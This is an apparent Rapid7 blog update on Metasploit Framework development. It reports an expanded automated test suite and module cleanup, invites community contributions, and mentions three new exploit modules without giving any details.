So, I don't know if you noticed, but over the last couple weeks, we've managed to hack and slash our way through a great big pile of Metasploit Framework bugs. First off, we just came off a Rapid7 push to shore up the continuous integration test infrastructure -- you can peek in on that at Travis-CI, and see that we juiced up the number of automated tests from about 980 to (as of now) 1,437 automatic tests that run with every build. Pretty much everyone here in the Rapid7 Metasploit hideout helped out with that, and so today, we have a really solid foundation for you, the community contributor, to start putting together useful regression testing on your favorite chunk of Metasploit.

In addition, our own Wei @sinn3r Chen took up the cause of cleaning up a bunch of existing modules to conform to our current code standards, opening and resolving about 50 tickets just on his own.

The moral of this story is that contributing to Metasploit Framework can be more than what most people think of -- writing exploit modules that exercise vulnerabilities. While that kind of work is probably the most fun and glamorous part of Metasploit, there are a lot of areas that could use automated testing, cleanup, and focused bug hunting. So, if you're more of a general Ruby hacker and not so much a security-focused hacker, that's totally okay by me. Feel free to jump in and fire off pull requests in our direction that provide repeatable testing for core Metasploit functionality, and you'll have a direct impact on improving the state of the art of open source security.

New Modules

We've got three new exploits this week. A little less than usual, but man, did we clean up a bunch of older modules. Twenty-four in all were touched for this release.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
